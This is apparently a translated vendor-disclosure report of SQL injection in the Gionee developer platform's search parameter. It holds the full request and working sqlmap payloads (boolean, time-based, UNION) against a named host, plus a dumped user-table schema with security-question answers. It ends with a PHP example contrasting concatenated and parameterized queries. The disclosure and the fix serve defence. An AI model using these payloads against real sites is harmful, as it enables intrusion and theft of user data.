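2015-11-02: Details reported to the vendor; awaiting vendor response
2015-11-02: Vendor confirmed; details disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and experts in related fields
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public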
As the title says.
Affected system: Gionee Developer Platform
Vulnerable URL:
GET /application?keywords=%E5%A6%82%E5%BD%B1&status= HTTP/1.1
Host: dev.anzhuoapk.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
Referer: http://dev.anzhuoapk.com/application
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=schun19uqoup3m2o8g0f9nm2l6; Hm_lvt_eac5031a4265d98af4563220293c8e47=1446174018,1446174210,1446175352,1446451177; Hm_lpvt_eac5031a4265d98af4563220293c8e47=1446451190
The keywords parameter is vulnerable to injection.
---
Parameter: keywords (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' AND 4031=4031 AND '%'='&status=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' AND (SELECT * FROM(SELECT(SLEEP(5)))aeuV) AND '%'='&status=

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6271,0x7a5948426a714447456f7566745244524350524750766b55434a494c4576495567427756686c4561,0x716a767a71),NULL,NULL,NULL-- &status=
---
[16:02:18] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.16
back-end DBMS: MySQL 5.0.12
Databases:
DBA privileges:
Information on 1.5 million users
Database: aorausermanagerdb
Table: aouserlistinfo
[9 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| Answer1      | varchar(100) |
| Answer2      | varchar(100) |
| Birthday     | date         |
| Email        | varchar(100) |
| Id           | int(11)      |
| Problem1Type | int(11)      |
| Problem2Type | int(11)      |
| Sex          | char(1)      |
| UserID       | int(11)      |
+--------------+--------------+
Filter the input.
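The boolean-based payload in the report closes a `LIKE '%...%'` string literal, which suggests the keyword is concatenated into the query; binding it as a parameter is a sturdier fix than filtering. The following is an added example, not the platform's own code: the `apps` table, its rows and both function names are constructed, and in-memory SQLite stands in for MySQL so the script runs offline (assumes the PDO SQLite driver is installed).

```php
<?php
// Added example with a constructed schema and constructed rows.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false
// so that parameters are bound by the server, not interpolated client-side.
$pdo->exec('CREATE TABLE apps (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO apps (name) VALUES ('alpha'), ('beta'), ('100% fun')");

// Vulnerable form: the keyword is concatenated into the LIKE pattern, so a
// quote in the input ends the string literal and the rest is parsed as SQL.
function searchConcat(PDO $pdo, $keywords) {
    $sql = "SELECT name FROM apps WHERE name LIKE '%" . $keywords . "%'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the keyword is bound as data and never parsed as SQL.
// LIKE wildcards in the input are escaped with '!' so they match literally.
function searchBound(PDO $pdo, $keywords) {
    $escaped = strtr($keywords, array('!' => '!!', '%' => '!%', '_' => '!_'));
    $stmt = $pdo->prepare("SELECT name FROM apps WHERE name LIKE :pat ESCAPE '!'");
    $stmt->execute(array(':pat' => '%' . $escaped . '%'));
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Same shape as the boolean-based test in the report: a true and a false
// condition appended after the keyword.
$true  = "alpha%' AND 4031=4031 AND '%'='";
$false = "alpha%' AND 4031=4032 AND '%'='";

// Concatenated query: the appended condition decides the result, which is
// the difference a boolean-based blind test relies on.
var_export(searchConcat($pdo, $true));   // one row
var_export(searchConcat($pdo, $false));  // no rows

// Bound query: both inputs are plain text that matches no app name.
var_export(searchBound($pdo, $true));
var_export(searchBound($pdo, $false));

// Legitimate searches still work, and '%' is matched as a literal character.
var_export(searchBound($pdo, 'alpha'));
var_export(searchBound($pdo, '100%'));
```

A useful regression check after the fix is that the two appended-condition inputs return identical results from the search endpoint.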
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-11-02 17:28
Thank you for your contribution to Gionee security.
None at this time.